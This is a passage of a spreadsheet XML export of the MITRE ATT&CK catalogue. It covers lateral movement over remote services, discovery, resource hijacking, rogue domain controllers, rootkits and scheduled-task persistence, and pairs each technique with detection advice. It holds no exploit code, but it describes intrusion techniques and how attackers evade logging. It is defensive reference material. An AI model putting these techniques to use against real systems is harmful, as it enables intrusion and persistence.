    <t>Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement.</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Module: Module Load, Network Share: Network Share Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1021.003</t>
  </si>
  <si>
    <t>Remote Services: Distributed Component Object Model</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/003</t>
  </si>
  <si>
    <t>Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017) Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.
Monitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.</t>
  </si>
  <si>
    <t>Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1021.001</t>
  </si>
  <si>
    <t>Remote Services: Remote Desktop Protocol</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) 
Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation: Alperovitch Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/001</t>
  </si>
  <si>
    <t>Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1021.002</t>
  </si>
  <si>
    <t>Remote Services: SMB/Windows Admin Shares</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.
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[Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/002</t>
  </si>
  <si>
    <t>Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne)(Citation: Windows Event Forwarding Payne) Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as [Net](https://attack.mitre.org/software/S0039), on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.(Citation: Medium Detecting WMI Persistence)</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Network Share: Network Share Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1021.004</t>
  </si>
  <si>
    <t>Remote Services: SSH</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.(Citation: SSH Secure Shell)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/004</t>
  </si>
  <si>
    <t>Use of SSH may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1021.005</t>
  </si>
  <si>
    <t>Remote Services: VNC</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). The adversary may then perform actions as the logged-on user.
VNC is a desktop sharing system that allows users to remotely control another computer’s display by relaying mouse and keyboard inputs over the network. VNC does not necessarily use standard user credentials. Instead, a VNC client and server may be configured with sets of credentials that are used only for VNC connections.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/005</t>
  </si>
  <si>
    <t>Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with VNC.</t>
  </si>
  <si>
    <t>T1021.006</t>
  </si>
  <si>
    <t>Remote Services: Windows Remote Management</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/006</t>
  </si>
  <si>
    <t>Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.(Citation: Medium Detecting Lateral Movement)</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>Remote System Discovery</t>
  </si>
  <si>
    <t>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[Ping](https://attack.mitre.org/software/S0097) or &lt;code&gt;net view&lt;/code&gt; using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: &lt;code&gt;C:\Windows\System32\Drivers\etc\hosts&lt;/code&gt; or &lt;code&gt;/etc/hosts&lt;/code&gt;) in order to discover the hostname to IP address mappings of remote systems. 
Specific to macOS, the &lt;code&gt;bonjour&lt;/code&gt; protocol exists to discover additional Mac-based systems within the same broadcast domain.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1018</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</si>
  <si>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Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used.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Monitor for processes that can be used to discover remote systems, such as &lt;code&gt;ping.exe&lt;/code&gt; and &lt;code&gt;tracert.exe&lt;/code&gt;, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Daniel Stepanic, Elastic; RedHuntLabs, @redhuntlabs</t>
  </si>
  <si>
    <t>T1091</t>
  </si>
  <si>
    <t>Replication Through Removable Media</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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1091</t>
  </si>
  <si>
    <t>Initial Access, Lateral Movement</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, then additional actions are likely to occur after execution, such as opening network connections for Command and Control and system and network information Discovery.</t>
  </si>
  <si>
    <t>Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>Resource Hijacking</t>
  </si>
  <si>
    <t>Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. 
One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining. Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)
Additionally, some cryptocurrency mining malware kills off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1496</t>
  </si>
  <si>
    <t>Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources. Monitor for suspicious use of network resources associated with cryptocurrency mining software. Monitor for common cryptomining software process names and files on local systems that may indicate compromise and resource usage.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; David Fiser, @anu4is, Trend Micro; Jay Chen, Palo Alto Networks; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>Rogue Domain Controller</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</si>
  <si>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(Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)
This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1207</t>
  </si>
  <si>
    <t>Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)
Leverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)
Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)
Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Modification, Network Traffic: Network Traffic Content, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1014</t>
  </si>
  <si>
    <t>Rootkit</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</si>
  <si>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 (Citation: Symantec Windows Rootkits) 
Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1014</t>
  </si>
  <si>
    <t>Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)</t>
  </si>
  <si>
    <t>Drive: Drive Modification, Firmware: Firmware Modification</t>
  </si>
  <si>
    <t>Anti-virus, Application control, Application control by file name or path, File monitoring, Host intrusion prevention systems, Signature-based detection, System access controls</t>
  </si>
  <si>
    <t>T1053</t>
  </si>
  <si>
    <t>Scheduled Task/Job</t>
  </si>
  <si>
    <t>Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053</t>
  </si>
  <si>
    <t>Execution, Persistence, Privilege Escalation</t>
  </si>
  <si>
    <t>Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. 
Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>Alain Homewood, Insomnia Security; Leo Loobeek, @leoloobeek; Prashant Verma, Paladion; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1053.001</t>
  </si>
  <si>
    <t>Scheduled Task/Job: At (Linux)</t>
  </si>
  <si>
    <t>Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)
An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/001</t>
  </si>
  <si>
    <t>03 December 2019</t>
  </si>
  <si>
    <t>Monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. 
Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>T1053.002</t>
  </si>
  <si>
    <t>Scheduled Task/Job: At (Windows)</t>
  </si>
  <si>
    <t>Adversaries may abuse the &lt;code&gt;at.exe&lt;/code&gt; utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. 
An adversary may use &lt;code&gt;at.exe&lt;/code&gt; in Windows environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).
Note: The &lt;code&gt;at.exe&lt;/code&gt; command line utility has been deprecated in current versions of Windows in favor of &lt;code&gt;schtasks&lt;/code&gt;.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/002</t>
  </si>
  <si>
    <t>27 November 2019</t>
  </si>
  <si>
    <t>Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)
* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered
* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated
* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted
* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created
* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled
* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>T1053.007</t>
  </si>
  <si>
    <t>Scheduled Task/Job: Container Orchestration Job</t>
  </si>
  <si>
    <t>Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in the cluster.(Citation: Threat Matrix for Kubernetes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/007</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for the anomalous creation of scheduled jobs in container orchestration environments. Use logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application and resource pods to monitor malicious container orchestration job deployments. </t>
  </si>
  <si>
    <t>Container: Container Creation, File: File Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>T1053.003</t>
  </si>
  <si>
    <t>Scheduled Task/Job: Cron</t>
  </si>
  <si>
    <t>Adversaries may abuse the &lt;code&gt;cron&lt;/code&gt; utility to perform task scheduling for initial or recurring execution of malicious code. The &lt;code&gt;cron&lt;/code&gt; utility is a time-based job scheduler for Unix-like operating systems.  The &lt;code&gt; crontab&lt;/code&gt; file contains the schedule of cron entries to be run and the specified times for execution. Any &lt;code&gt;crontab&lt;/code&gt; files are stored in operating system-specific file paths.
An adversary may use &lt;code&gt;cron&lt;/code&gt; in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. &lt;code&gt;cron&lt;/code&gt; can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/003</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc.  
Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. </t>
  </si>
  <si>
    <t>T1053.004</t>
  </si>
  <si>
    <t>Scheduled Task/Job: Launchd</t>
  </si>
  <si>
    <t>Adversaries may abuse the &lt;code&gt;Launchd&lt;/code&gt; daemon to perform task scheduling for initial or recurring execution of malicious code. The &lt;code&gt;launchd&lt;/code&gt; daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in &lt;code&gt;/System/Library/LaunchDaemons&lt;/code&gt; and &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt; (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).
An adversary may use the &lt;code&gt;launchd&lt;/code&gt; daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. &lt;code&gt;launchd&lt;/code&gt; can also be abused to run a process under the context of a specified account. Daemons, such as &lt;code&gt;launchd&lt;/code&gt;, run with the permissions of the root user account, and will operate regardless of which user account is logged in.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/004</t>
  </si>
  <si>
    <t>T1053.005</t>
  </si>
  <si>
    <t>Scheduled Task/Job: Scheduled Task</t>
  </si>
  <si>
    <t>Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The &lt;code&gt;schtasks&lt;/code&gt; can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.
The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though &lt;code&gt;at.exe&lt;/code&gt; can not access tasks created with &lt;code&gt;schtasks&lt;/code&gt; or the Control Panel.
An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/005</t>
  </si>
  <si>
    <t>30 December 2020</t>
  </si>
  <si>
    <t>Monitor process execution from the &lt;code&gt;svchost.exe&lt;/code&gt; in Windows 10 and the Windows Task Scheduler &lt;code&gt;taskeng.exe&lt;/code&gt; for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)
* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered
* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated
* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted
* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created
* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled
* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>T1053.006</t>
  </si>
  <si>
    <t>Scheduled Task/Job: Systemd Timers</t>
  </si>
  <si>
    <t>Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension &lt;code&gt;.timer&lt;/code&gt; that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020)
Each &lt;code&gt;.timer&lt;/code&gt; file must have a corresponding &lt;code&gt;.service&lt;/code&gt; file with the same name, e.g., &lt;code&gt;example.timer&lt;/code&gt; and &lt;code&gt;example.service&lt;/code&gt;. &lt;code&gt;.service&lt;/code&gt; files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to &lt;code&gt;/etc/systemd/system/&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; while user level are written to &lt;code&gt;~/.config/systemd/user/&lt;/code&gt;.
An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/006</t>
  </si>
  <si>
    <t>Systemd timer unit files may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/systemd/system&lt;/code&gt;, &lt;code&gt;/usr/lib/systemd/system/&lt;/code&gt;, and &lt;code&gt;~/.config/systemd/user/&lt;/code&gt; directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: &lt;code&gt;systemctl list-timers –all&lt;/code&gt;. Analyze the contents of corresponding &lt;code&gt;.service&lt;/code&gt; files present on the file system and ensure that they refer to legitimate, expected executables.
Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)</t>
  </si>
  <si>
    <t>SarathKumar Rajendran, Trimble Inc</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1029</t>
  </si>
  <si>
